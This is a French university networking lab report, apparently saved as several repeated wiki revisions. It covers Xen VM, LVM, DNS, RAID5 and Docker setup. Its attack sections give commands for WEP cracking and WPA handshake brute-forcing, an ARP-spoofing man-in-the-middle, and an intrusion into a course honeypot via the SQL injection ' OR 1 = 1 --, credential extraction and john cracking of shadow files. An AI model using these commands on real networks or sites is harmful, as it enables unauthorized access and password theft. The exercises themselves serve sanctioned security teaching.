&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55151</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55151"/>
				<updated>2020-12-21T23:05:19Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous allons utiliser l'implementation open-source de DNS bind pour créer une association entre notre nom de domaine et l'ip de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
A (Host address)&lt;br /&gt;
AAAA (IPv6 host address)&lt;br /&gt;
ALIAS (Auto resolved alias)&lt;br /&gt;
CNAME (Canonical name for an alias)&lt;br /&gt;
MX (Mail eXchange)&lt;br /&gt;
NS (Name Server)&lt;br /&gt;
PTR (Pointer)&lt;br /&gt;
SOA (Start Of Authority)&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55150</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55150"/>
				<updated>2020-12-21T23:04:20Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous allons utiliser l'implementation open-source de DNS bind pour créer une association entre notre nom de domaine et l'ip de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
